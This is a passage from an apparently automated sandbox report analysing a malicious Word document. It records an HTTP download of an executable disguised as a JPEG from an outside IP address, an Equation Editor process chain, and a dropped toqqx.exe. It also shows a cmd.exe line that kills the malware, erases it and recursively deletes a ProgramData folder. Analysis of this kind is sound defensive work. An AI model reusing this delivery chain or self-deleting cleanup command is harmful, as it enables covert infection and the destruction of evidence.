                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:20.959001064 CEST | 6676 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:20 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:02:02 GMT
                                                                ETag: "14748-58aa8287d6a80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 83784
                                                                Keep-Alive: timeout=5, max=94
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                System Behavior

                                                                General

                                                                Start time:21:33:34
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                Imagebase:0x13f1e0000
                                                                File size:1424032 bytes
                                                                MD5 hash:95C38D04597050285A18F66039EDB456
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:33:53
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:33:54
                                                                Start date:04/05/2021
                                                                Path:C:\Users\user\toqqx.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\toqqx.exe
                                                                Imagebase:0x1030000
                                                                File size:251192 bytes
                                                                MD5 hash:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Antivirus matches:
                                                                • Detection: 47%, ReversingLabs
                                                                Reputation:low

                                                                General

                                                                Start time:21:33:56
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:34:01
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:34:02
                                                                Start date:04/05/2021
                                                                Path:C:\Users\user\toqqx.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\toqqx.exe
                                                                Imagebase:0x1030000
                                                                File size:251192 bytes
                                                                MD5 hash:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                General

                                                                Start time:21:34:03
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:34:04
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:34:48
                                                                Start date:04/05/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Imagebase:0x1020000
                                                                File size:251192 bytes
                                                                MD5 hash:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 47%, ReversingLabs
                                                                Reputation:low

                                                                General

                                                                Start time:21:34:56
                                                                Start date:04/05/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Imagebase:0x1020000
                                                                File size:251192 bytes
                                                                MD5 hash:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                General

                                                                Start time:21:35:03
                                                                Start date:04/05/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit
                                                                Imagebase:0x4a080000
                                                                File size:302592 bytes
                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:35:04
                                                                Start date:04/05/2021
                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:taskkill /pid 2540
                                                                Imagebase:0xcc0000
                                                                File size:77824 bytes
                                                                MD5 hash:94BDCAFBD584C979B385ADEE14B08AB4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Disassembly

                                                                Code Analysis
